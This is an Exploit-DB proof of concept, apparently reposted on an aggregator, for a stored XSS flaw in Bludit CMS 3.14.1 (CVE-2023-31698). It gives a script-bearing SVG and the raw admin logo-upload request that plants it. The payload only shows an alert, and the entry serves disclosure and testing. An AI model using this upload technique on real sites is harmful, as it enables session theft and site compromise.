Bludit CMS v3.14.1 – Stored Cross-Site Scripting (XSS) (Authenticated)

• Exploit Database
• 13 阅读

• 作者： Rahad Chowdhury
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51476/

• # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
  # Date: 2023-04-15
  # Exploit Author: Rahad Chowdhury
  # Vendor Homepage: https://www.bludit.com/
  # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
  # Version: 3.14.1
  # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
  # CVE: CVE-2023-31698
  
  SVG Payload
  -------------
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
  http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
  "/>
  <script type="text/javascript">
  alert(document.domain);
  </script>
  </svg>
  
  save this SVG file xss.svg
  
  Steps to Reproduce:
  
  1. At first login your admin panel.
  2. then go to settings and click the logo section.
  3. Now upload xss.svg file so your request data will be
  
  POST /bludit/admin/ajax/logo-upload HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
  Gecko/20100101 Firefox/112.0
  Content-Type: multipart/form-data;
  boundary=---------------------------15560729415644048492005010998
  Referer: http://127.0.0.1/bludit/admin/settings
  Cookie: BLUDITREMEMBERUSERNAME=admin;
  BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;
  BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
  Content-Length: 651
  
  -----------------------------15560729415644048492005010998
  Content-Disposition: form-data; name="tokenCSRF"
  
  626c201693546f472cdfc11bed0938aab8c6e480
  -----------------------------15560729415644048492005010998
  Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
  Content-Type: image/svg+xml
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
  http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
  "/>
  <script type="text/javascript">
  alert(document.domain);
  </script>
  </svg>
  
  -----------------------------15560729415644048492005010998--
  
  4. Now open the logo image link that you upload. You will see XSS pop up.